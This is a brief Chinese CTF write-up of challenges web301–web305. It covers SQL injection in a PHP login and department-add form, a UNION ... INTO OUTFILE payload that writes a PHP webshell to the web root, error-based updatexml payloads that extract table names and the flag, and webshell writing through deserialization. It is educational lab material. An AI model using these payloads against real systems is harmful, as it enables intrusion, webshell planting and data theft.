web301
漏洞点checklogin.php
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
sqlmap一把梭出来账号密码登录拿到flag
web302
更改部分
if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){
sqlmap跑出来账号密码却不知为何无法登录,然后尝试写入webshell
payload
userid=a'%20union%20select%20"<?php%20phpinfo();?>"%20into%20outfile%20"/var/www/html/a.php"%23&userpwd=b
访问a.php
写入一句话然后查看文件
web303
弱口令admin admin登录
然后审计代码,发现在dptadd.php中提交的信息会通过inster存入到数据库中,但是并未做任何过滤,inster注入尝试
payload
123' and updatexml(1,concat(0x7e,database()),0)#
123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g'),0x7e),1)#
123' and updatexml(1,concat(0x7e,substr((select group_concat(flag) from sds_fl9g),1,30),0x7e),1)# 123' and updatexml(1,concat(0x7e,substr((select group_concat(flag) from sds_fl9g),30,60),0x7e),1)#
web304
注入点处和上题没区别,按照上一题的payload走就好
web305
审计代码发现存在反序列化且用户和密码可控,file_put_contents尝试写入一句话